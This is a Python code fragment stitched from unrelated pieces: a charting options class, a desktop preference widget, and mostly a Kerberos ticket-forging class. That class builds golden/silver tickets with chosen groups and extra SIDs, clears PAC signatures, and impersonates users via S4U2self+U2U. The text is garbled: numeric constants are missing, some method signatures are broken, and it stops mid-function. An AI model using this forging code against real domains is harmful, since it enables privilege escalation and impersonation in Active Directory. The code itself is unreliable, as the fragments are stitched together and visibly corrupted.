return self._config_sub_data('time', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTime)
def tremolo(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTremolo':
return self._config_sub_data('tremolo', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTremolo)
def volume(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingVolume':
return self._config_sub_data('volume', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingVolume) |
class FadingDurationPreference(widgets.SpinPreference, widgets.CheckConditional):
default = 50
name = 'plugin/desktopcover/fading_duration'
condition_preference_name = 'plugin/desktopcover/fading'
def __init__(self, preferences, widget):
widgets.SpinPreference.__init__(self, preferences, widget)
widgets.CheckConditional.__init__(self) |
class TICKETER():
def __init__(self, target, password, domain, options):
self.__password = password
self.__target = target
self.__domain = domain
self.__options = options
self.__tgt = None
self.__tgt_session_key = None
if options.spn:
spn = options.spn.split('/')
self.__service = spn[0]
self.__server = spn[1]
if (options.keytab is not None):
self.loadKeysFromKeytab(options.keytab)
else:
self.__service = 'krbtgt'
self.__server = self.__domain
def getFileTime(t):
t *=
t +=
return t
def getPadLength(data_length):
return ((((data_length + 7) // 8) * 8) - data_length)
def getBlockLength(data_length):
return (((data_length + 7) // 8) * 8)
def loadKeysFromKeytab(self, filename):
keytab = Keytab.loadFile(filename)
keyblock = keytab.getKey(('%%s' % (options.spn, self.__domain)))
if keyblock:
if ((keyblock['keytype'] == Enctype.AES256) or (keyblock['keytype'] == Enctype.AES128)):
options.aesKey = keyblock.hexlifiedValue()
elif (keyblock['keytype'] == Enctype.RC4):
options.nthash = keyblock.hexlifiedValue()
else:
logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn)
def createBasicValidationInfo(self):
kerbdata = KERB_VALIDATION_INFO()
aTime = timegm(datetime.datetime.utcnow().timetuple())
unixTime = self.getFileTime(aTime)
kerbdata['LogonTime']['dwLowDateTime'] = (unixTime & )
kerbdata['LogonTime']['dwHighDateTime'] = (unixTime >> 32)
kerbdata['LogoffTime']['dwLowDateTime'] =
kerbdata['LogoffTime']['dwHighDateTime'] =
kerbdata['KickOffTime']['dwLowDateTime'] =
kerbdata['KickOffTime']['dwHighDateTime'] =
kerbdata['PasswordLastSet']['dwLowDateTime'] = (unixTime & )
kerbdata['PasswordLastSet']['dwHighDateTime'] = (unixTime >> 32)
kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
kerbdata['PasswordCanChange']['dwHighDateTime'] = 0
kerbdata['PasswordMustChange']['dwLowDateTime'] =
kerbdata['PasswordMustChange']['dwHighDateTime'] =
kerbdata['EffectiveName'] = self.__target
kerbdata['FullName'] = ''
kerbdata['LogonScript'] = ''
kerbdata['ProfilePath'] = ''
kerbdata['HomeDirectory'] = ''
kerbdata['HomeDirectoryDrive'] = ''
kerbdata['LogonCount'] = 500
kerbdata['BadPasswordCount'] = 0
kerbdata['UserId'] = int(self.__options.user_id)
groups = self.__options.groups.split(',')
if (len(groups) == 0):
kerbdata['PrimaryGroupId'] = 513
else:
kerbdata['PrimaryGroupId'] = int(groups[0])
kerbdata['GroupCount'] = len(groups)
for group in groups:
groupMembership = GROUP_MEMBERSHIP()
groupId = NDRULONG()
groupId['Data'] = int(group)
groupMembership['RelativeId'] = groupId
groupMembership['Attributes'] = ((SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT) | SE_GROUP_ENABLED)
kerbdata['GroupIds'].append(groupMembership)
kerbdata['UserFlags'] = 0
kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
kerbdata['LogonServer'] = ''
kerbdata['LogonDomainName'] = self.__domain.upper()
kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid)
kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00'
kerbdata['UserAccountControl'] = (USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD)
kerbdata['SubAuthStatus'] = 0
kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
kerbdata['FailedILogonCount'] = 0
kerbdata['Reserved3'] = 0
kerbdata['ResourceGroupDomainSid'] = NULL
kerbdata['ResourceGroupCount'] = 0
kerbdata['ResourceGroupIds'] = NULL
validationInfo = VALIDATION_INFO()
validationInfo['Data'] = kerbdata
return validationInfo
def createBasicPac(self, kdcRep):
validationInfo = self.createBasicValidationInfo()
pacInfos = {}
pacInfos[PAC_LOGON_INFO] = (validationInfo.getData() + validationInfo.getDataReferents())
srvCheckSum = PAC_SIGNATURE_DATA()
privCheckSum = PAC_SIGNATURE_DATA()
if (kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value):
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value
srvCheckSum['Signature'] = (b'\x00' * 16)
privCheckSum['Signature'] = (b'\x00' * 16)
else:
srvCheckSum['Signature'] = (b'\x00' * 12)
privCheckSum['Signature'] = (b'\x00' * 12)
if (len(self.__options.aesKey) == 64):
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value
else:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value
pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData()
pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData()
clientInfo = PAC_CLIENT_INFO()
clientInfo['Name'] = self.__target.encode('utf-16le')
clientInfo['NameLength'] = len(clientInfo['Name'])
pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData()
if self.__options.extra_pac:
self.createUpnDnsPac(pacInfos)
if (self.__options.old_pac is False):
self.createAttributesInfoPac(pacInfos)
self.createRequestorInfoPac(pacInfos)
return pacInfos
def createUpnDnsPac(self, pacInfos):
upnDnsInfo = UPN_DNS_INFO_FULL()
PAC_pad = (b'\x00' * self.getPadLength(len(upnDnsInfo)))
upn_data = f'{self.__target.lower()}{self.__domain.lower()}'.encode('utf-16-le')
upnDnsInfo['UpnLength'] = len(upn_data)
upnDnsInfo['UpnOffset'] = (len(upnDnsInfo) + len(PAC_pad))
total_len = (upnDnsInfo['UpnOffset'] + upnDnsInfo['UpnLength'])
pad = self.getPadLength(total_len)
upn_data += (b'\x00' * pad)
dns_name = self.__domain.upper().encode('utf-16-le')
upnDnsInfo['DnsDomainNameLength'] = len(dns_name)
upnDnsInfo['DnsDomainNameOffset'] = (total_len + pad)
total_len = (upnDnsInfo['DnsDomainNameOffset'] + upnDnsInfo['DnsDomainNameLength'])
pad = self.getPadLength(total_len)
dns_name += (b'\x00' * pad)
upnDnsInfo['Flags'] = 2
samName = self.__target.encode('utf-16-le')
upnDnsInfo['SamNameLength'] = len(samName)
upnDnsInfo['SamNameOffset'] = (total_len + pad)
total_len = (upnDnsInfo['SamNameOffset'] + upnDnsInfo['SamNameLength'])
pad = self.getPadLength(total_len)
samName += (b'\x00' * pad)
user_sid = SID()
user_sid.fromCanonical(f'{self.__options.domain_sid}-{self.__options.user_id}')
upnDnsInfo['SidLength'] = len(user_sid)
upnDnsInfo['SidOffset'] = (total_len + pad)
total_len = (upnDnsInfo['SidOffset'] + upnDnsInfo['SidLength'])
pad = self.getPadLength(total_len)
user_data = (user_sid.getData() + (b'\x00' * pad))
post_pac_data = (((upn_data + dns_name) + samName) + user_data)
pacInfos[PAC_UPN_DNS_INFO] = ((upnDnsInfo.getData() + PAC_pad) + post_pac_data)
def createAttributesInfoPac(pacInfos):
pacAttributes = PAC_ATTRIBUTE_INFO()
pacAttributes['FlagsLength'] = 2
pacAttributes['Flags'] = 1
pacInfos[PAC_ATTRIBUTES_INFO] = pacAttributes.getData()
def createRequestorInfoPac(self, pacInfos):
pacRequestor = PAC_REQUESTOR()
pacRequestor['UserSid'] = SID()
pacRequestor['UserSid'].fromCanonical(f'{self.__options.domain_sid}-{self.__options.user_id}')
pacInfos[PAC_REQUESTOR_INFO] = pacRequestor.getData()
def createBasicTicket(self):
if (self.__options.request is True):
if (self.__domain == self.__server):
logging.info('Requesting TGT to target domain to use as basis')
else:
logging.info('Requesting TGT/TGS to target domain to use as basis')
if (self.__options.hashes is not None):
(lmhash, nthash) = self.__options.hashes.split(':')
else:
lmhash = ''
nthash = ''
userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value)
(tgt, cipher, oldSessionKey, sessionKey) = getKerberosTGT(userName, self.__password, self.__domain, unhexlify(lmhash), unhexlify(nthash), None, self.__options.dc_ip)
(self.__tgt, self.__tgt_cipher, self.__tgt_session_key) = (tgt, cipher, sessionKey)
if (self.__domain == self.__server):
kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
else:
serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value)
(tgs, cipher, oldSessionKey, sessionKey) = getKerberosTGS(serverName, self.__domain, None, tgt, cipher, sessionKey)
kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
encPartCipher = int(kdcRep['enc-part']['etype'])
if (((ticketCipher == EncryptionTypes.rc4_hmac.value) or (encPartCipher == EncryptionTypes.rc4_hmac.value)) and (self.__options.nthash is None)):
logging.critical("rc4_hmac is used in this ticket and you haven't specified the -nthash parameter. Can't continue ( or try running again w/o the -request option)")
return (None, None)
if (((ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value)) and (self.__options.aesKey is None)):
logging.critical("aes128_cts_hmac_sha1_96 is used in this ticket and you haven't specified the -aesKey parameter. Can't continue (or try running again w/o the -request option)")
return (None, None)
if (((ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value)) and (self.__options.aesKey is not None) and (len(self.__options.aesKey) > 32)):
logging.critical("aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. Can't continue (or try running again w/o the -request option)")
return (None, None)
if (((ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value)) and (self.__options.aesKey is None)):
logging.critical("aes256_cts_hmac_sha1_96 is used in this ticket and you haven't specified the -aesKey parameter. Can't continue (or try running again w/o the -request option)")
return (None, None)
if (((ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value)) and (self.__options.aesKey is not None) and (len(self.__options.aesKey) < 64)):
logging.critical("aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. Can't continue")
return (None, None)
kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['cname']['name-string'] = noValue
kdcRep['cname']['name-string'][0] = (self.__options.impersonate or self.__target)
else:
logging.info('Creating basic skeleton ticket and PAC Infos')
if (self.__domain == self.__server):
kdcRep = AS_REP()
kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value
else:
kdcRep = TGS_REP()
kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value
kdcRep['pvno'] = 5
if (self.__options.nthash is None):
kdcRep['padata'] = noValue
kdcRep['padata'][0] = noValue
kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value
etype2 = ETYPE_INFO2()
etype2[0] = noValue
if (len(self.__options.aesKey) == 64):
etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
else:
etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
etype2[0]['salt'] = ('%s%s' % (self.__domain.upper(), self.__target))
encodedEtype2 = encoder.encode(etype2)
kdcRep['padata'][0]['padata-value'] = encodedEtype2
kdcRep['crealm'] = self.__domain.upper()
kdcRep['cname'] = noValue
kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['cname']['name-string'] = noValue
kdcRep['cname']['name-string'][0] = self.__target
kdcRep['ticket'] = noValue
kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value
kdcRep['ticket']['realm'] = self.__domain.upper()
kdcRep['ticket']['sname'] = noValue
kdcRep['ticket']['sname']['name-string'] = noValue
kdcRep['ticket']['sname']['name-string'][0] = self.__service
if (self.__domain == self.__server):
kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper()
else:
kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['ticket']['sname']['name-string'][1] = self.__server
kdcRep['ticket']['enc-part'] = noValue
kdcRep['ticket']['enc-part']['kvno'] = 2
kdcRep['enc-part'] = noValue
if (self.__options.nthash is None):
if (len(self.__options.aesKey) == 64):
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
else:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
else:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
kdcRep['enc-part']['kvno'] = 2
kdcRep['enc-part']['cipher'] = noValue
pacInfos = self.createBasicPac(kdcRep)
return (kdcRep, pacInfos)
def getKerberosS4U2SelfU2U(self):
tgt = self.__tgt
cipher = self.__tgt_cipher
sessionKey = self.__tgt_session_key
kdcHost = self.__options.dc_ip
decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
ticket = Ticket()
ticket.from_asn1(decodedTGT['ticket'])
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
opts = list()
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq, 'ticket', ticket.to_asn1)
authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = str(decodedTGT['crealm'])
clientName = Principal()
clientName.from_asn1(decodedTGT, 'crealm', 'cname')
seq_set(authenticator, 'cname', clientName.components_to_asn1)
now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)
if (logging.getLogger().level == logging.DEBUG):
logging.debug('AUTHENTICATOR')
print(authenticator.prettyPrint())
print('\n')
encodedAuthenticator = encoder.encode(authenticator)
encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = cipher.enctype
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
encodedApReq = encoder.encode(apReq)
tgsReq = TGS_REQ()
tgsReq['pvno'] = 5
tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
tgsReq['padata'] = noValue
tgsReq['padata'][0] = noValue
tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
tgsReq['padata'][0]['padata-value'] = encodedApReq
clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
S4UByteArray += ((b(self.__options.impersonate) + b(self.__domain)) + b'Kerberos')
if (logging.getLogger().level == logging.DEBUG):
logging.debug('S4UByteArray')
hexdump(S4UByteArray)
checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
if (logging.getLogger().level == logging.DEBUG):
logging.debug('CheckSum')
hexdump(checkSum)
paForUserEnc = PA_FOR_USER_ENC()
seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
paForUserEnc['userRealm'] = self.__domain
paForUserEnc['cksum'] = noValue
paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
paForUserEnc['cksum']['checksum'] = checkSum
paForUserEnc['auth-package'] = 'Kerberos'
if (logging.getLogger().level == logging.DEBUG):
logging.debug('PA_FOR_USER_ENC')
print(paForUserEnc.prettyPrint())
encodedPaForUserEnc = encoder.encode(paForUserEnc)
tgsReq['padata'][1] = noValue
tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
reqBody = seq_set(tgsReq, 'req-body')
opts = list()
opts.append(constants.KDCOptions.forwardable.value)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.canonicalize.value)
opts.append(constants.KDCOptions.renewable_ok.value)
opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
reqBody['kdc-options'] = constants.encodeFlags(opts)
serverName = Principal(self.__options.user, self.__options.domain, type=constants.PrincipalNameType.NT_UNKNOWN.value)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
reqBody['realm'] = str(decodedTGT['crealm'])
now = (datetime.datetime.utcnow() + datetime.timedelta(days=1))
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = random.getrandbits(31)
seq_set_iter(reqBody, 'etype', (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
seq_set_iter(reqBody, 'additional-tickets', (ticket.to_asn1(TicketAsn1()),))
if (logging.getLogger().level == logging.DEBUG):
logging.debug('Final TGS')
print(tgsReq.prettyPrint())
message = encoder.encode(tgsReq)
r = sendReceive(message, self.__domain, kdcHost)
return (r, None, sessionKey, None)
def customizeTicket(self, kdcRep, pacInfos):
logging.info(('Customizing ticket for %s/%s' % (self.__domain, self.__target)))
ticketDuration = (datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration)))
if self.__options.impersonate:
logging.info(("\tRequesting S4U2self+U2U to obtain %s's PAC" % self.__options.impersonate))
(tgs, cipher, oldSessionKey, sessionKey) = self.getKerberosS4U2SelfU2U()
logging.info('\tDecrypting ticket & extracting PAC')
decodedTicket = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
cipherText = decodedTicket['ticket']['enc-part']['cipher']
newCipher = _enctype_table[int(decodedTicket['ticket']['enc-part']['etype'])]
plainText = newCipher.decrypt(self.__tgt_session_key, 2, cipherText)
encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]
pacType = pac.PACTYPE(adIfRelevant[0]['ad-data'].asOctets())
pacInfos = dict()
buff = pacType['Buffers']
AttributesInfoPacInS4UU2UPAC = False
RequestorInfoPacInS4UU2UPAC = False
logging.info('\tClearing signatures')
for bufferN in range(pacType['cBuffers']):
infoBuffer = pac.PAC_INFO_BUFFER(buff)
data = pacType['Buffers'][(infoBuffer['Offset'] - 8):][:infoBuffer['cbBufferSize']]
buff = buff[len(infoBuffer):]
if (infoBuffer['ulType'] in [PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM]):
checksum = PAC_SIGNATURE_DATA(data)
if (checksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
checksum['Signature'] = ('\x00' * 12)
elif (checksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
checksum['Signature'] = ('\x00' * 12)
else:
checksum['Signature'] = ('\x00' * 16)
pacInfos[infoBuffer['ulType']] = checksum.getData()
elif (infoBuffer['ulType'] == PAC_ATTRIBUTES_INFO):
AttributesInfoPacInS4UU2UPAC = True
pacInfos[infoBuffer['ulType']] = data
elif (infoBuffer['ulType'] == PAC_REQUESTOR_INFO):
RequestorInfoPacInS4UU2UPAC = True
pacInfos[infoBuffer['ulType']] = data
else:
pacInfos[infoBuffer['ulType']] = data
if ((self.__options.old_pac is False) and (not AttributesInfoPacInS4UU2UPAC)):
self.createAttributesInfoPac(pacInfos)
if ((self.__options.old_pac is False) and (not RequestorInfoPacInS4UU2UPAC)):
if (self.__options.user_id == '500'):
logging.warning("User ID is 500, which is Impacket's default. If you specified -user-id, you can ignore this message. If you didn't, and you get a KDC_ERR_TGT_REVOKED error when using the ticket, you will need to specify the -user-id with the RID of the target user to impersonate")
self.createRequestorInfoPac(pacInfos)
logging.info('\tAdding necessary ticket flags')
originalFlags = [i for (i, x) in enumerate(list(encTicketPart['flags'].asBinary())) if (x == '1')]
flags = originalFlags
newFlags = [TicketFlags.forwardable.value, TicketFlags.proxiable.value, TicketFlags.renewable.value, TicketFlags.pre_authent.value]
if (self.__domain == self.__server):
newFlags.append(TicketFlags.initial.value)
for newFlag in newFlags:
if (newFlag not in originalFlags):
flags.append(newFlag)
encTicketPart['flags'] = encodeFlags(flags)
logging.info('\tChanging keytype')
encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
if (encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value):
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
elif (encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value):
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
else:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
else:
encTicketPart = EncTicketPart()
flags = list()
flags.append(TicketFlags.forwardable.value)
flags.append(TicketFlags.proxiable.value)
flags.append(TicketFlags.renewable.value)
if (self.__domain == self.__server):
flags.append(TicketFlags.initial.value)
flags.append(TicketFlags.pre_authent.value)
encTicketPart['flags'] = encodeFlags(flags)
encTicketPart['key'] = noValue
encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
if (encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value):
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
elif (encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value):
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
else:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
encTicketPart['crealm'] = self.__domain.upper()
encTicketPart['cname'] = noValue
encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
encTicketPart['cname']['name-string'] = noValue
encTicketPart['cname']['name-string'][0] = self.__target
encTicketPart['transited'] = noValue
encTicketPart['transited']['tr-type'] = 0
encTicketPart['transited']['contents'] = ''
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
encTicketPart['authorization-data'] = noValue
encTicketPart['authorization-data'][0] = noValue
encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
encTicketPart['authorization-data'][0]['ad-data'] = noValue
if (PAC_LOGON_INFO in pacInfos):
data = pacInfos[PAC_LOGON_INFO]
validationInfo = VALIDATION_INFO()
validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
lenVal = len(validationInfo.getData())
validationInfo.fromStringReferents(data, lenVal)
aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))
unixTime = self.getFileTime(aTime)
kerbdata = KERB_VALIDATION_INFO()
kerbdata['LogonTime']['dwLowDateTime'] = (unixTime & )
kerbdata['LogonTime']['dwHighDateTime'] = (unixTime >> 32)
validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
validationInfo['Data']['EffectiveName'] = self.__target
groups = self.__options.groups.split(',')
validationInfo['Data']['GroupIds'] = list()
validationInfo['Data']['GroupCount'] = len(groups)
for group in groups:
groupMembership = GROUP_MEMBERSHIP()
groupId = NDRULONG()
groupId['Data'] = int(group)
groupMembership['RelativeId'] = groupId
groupMembership['Attributes'] = ((SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT) | SE_GROUP_ENABLED)
validationInfo['Data']['GroupIds'].append(groupMembership)
if (self.__options.extra_sid is not None):
extrasids = self.__options.extra_sid.split(',')
if (validationInfo['Data']['SidCount'] == 0):
validationInfo['Data']['UserFlags'] |= 32
validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
for extrasid in extrasids:
validationInfo['Data']['SidCount'] += 1
sidRecord = KERB_SID_AND_ATTRIBUTES()
sid = RPC_SID()
sid.fromCanonical(extrasid)
sidRecord['Sid'] = sid
sidRecord['Attributes'] = ((SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT) | SE_GROUP_ENABLED)
validationInfo['Data']['ExtraSids'].append(sidRecord)
else:
validationInfo['Data']['ExtraSids'] = NULL
validationInfoBlob = (validationInfo.getData() + validationInfo.getDataReferents())
pacInfos[PAC_LOGON_INFO] = validationInfoBlob
if (logging.getLogger().level == logging.DEBUG):
logging.debug('VALIDATION_INFO after making it gold')
validationInfo.dump()
print('\n')
else:
raise Exception('PAC_LOGON_INFO not found! Aborting')
logging.info('\tPAC_LOGON_INFO')
if (PAC_SERVER_CHECKSUM in pacInfos):
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
if (serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
serverChecksum['Signature'] = ('\x00' * 12)
elif (serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
serverChecksum['Signature'] = ('\x00' * 12)
else:
serverChecksum['Signature'] = ('\x00' * 16)
pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
else:
raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
if (PAC_PRIVSVR_CHECKSUM in pacInfos):
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksum['Signature'] = ('\x00' * 12)
if (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value):
privSvrChecksum['Signature'] = ('\x00' * 12)
elif (privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value):
privSvrChecksum['Signature'] = ('\x00' * 12)
else:
privSvrChecksum['Signature'] = ('\x00' * 16)
pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
else:
raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
if (PAC_CLIENT_INFO_TYPE in pacInfos):
pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
pacClientInfo['ClientId'] = unixTime
pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
else:
raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
logging.info('\tPAC_CLIENT_INFO_TYPE')
logging.info('\tEncTicketPart')
if (self.__domain == self.__server):
encRepPart = EncASRepPart()
else:
encRepPart = EncTGSRepPart()
encRepPart['key'] = noValue
encRepPart['key']['keytype'] = encTicketPart['key']['keytype']
encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue']
encRepPart['last-req'] = noValue
encRepPart['last-req'][0] = noValue
encRepPart['last-req'][0]['lr-type'] = 0
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encRepPart['nonce'] =
encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)
flags = []
for i in encTicketPart['flags']:
flags.append(i)
encRepPart['flags'] = flags
encRepPart['authtime'] = str(encTicketPart['authtime'])
encRepPart['endtime'] = str(encTicketPart['endtime'])
encRepPart['starttime'] = str(encTicketPart['starttime'])
encRepPart['renew-till'] = str(encTicketPart['renew-till'])
encRepPart['srealm'] = self.__domain.upper()
encRepPart['sname'] = noValue
encRepPart['sname']['name-string'] = noValue
encRepPart['sname']['name-string'][0] = self.__service
if (self.__domain == self.__server):
encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
encRepPart['sname']['name-string'][1] = self.__domain.upper()
logging.info('\tEncAsRepPart')
else:
encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
encRepPart['sname']['name-string'][1] = self.__server
logging.info('\tEncTGSRepPart')
return (encRepPart, encTicketPart, pacInfos)
def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
logging.info('Signing/Encrypting final ticket')
pac_count = 4
validationInfoBlob = pacInfos[PAC_LOGON_INFO]
validationInfoAlignment = (b'\x00' * self.getPadLength(len(validationInfoBlob)))
pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
pacClientInfoAlignment = (b'\x00' * self.getPadLength(len(pacClientInfoBlob)))
pacUpnDnsInfoBlob = None
pacUpnDnsInfoAlignment = None
if (PAC_UPN_DNS_INFO in pacInfos):
pac_count += 1
pacUpnDnsInfoBlob = pacInfos[PAC_UPN_DNS_INFO]
pacUpnDnsInfoAlignment = (b'\x00' * self.getPadLength(len(pacUpnDnsInfoBlob)))
pacAttributesInfoBlob = None
